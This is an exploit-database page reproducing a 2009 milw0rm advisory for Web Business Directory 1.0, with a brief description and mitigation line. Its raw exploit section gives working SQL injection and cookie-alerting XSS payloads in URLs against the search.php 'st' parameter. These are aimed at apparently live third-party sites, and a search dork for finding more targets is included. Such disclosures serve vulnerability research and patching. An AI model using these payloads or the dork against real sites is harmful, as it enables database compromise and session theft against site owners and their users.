header-logo
Suggest Exploit
vendor:
Web Business Directory
by:
Moudi
7,5
CVSS
HIGH
SQL Injection and XSS
89 (SQL Injection) and 79 (XSS)
CWE
Product Name: Web Business Directory
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities

The Web Business Directory 1.0 (search.php) is vulnerable to SQL Injection and XSS. An attacker can exploit this vulnerability by sending malicious SQL queries and XSS payloads to the vulnerable parameter 'st' in the search.php file.

Mitigation:

Input validation and sanitization should be done to prevent SQL Injection and XSS attacks.
Source

Exploit-DB raw data:

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Web Business Directory 1.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.phpdirectorysource.com/  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
        [»] Price:              [ $75.00   ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit SQL INJECTION + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-21]

Navigation

Suggest Exploit

Services By CQR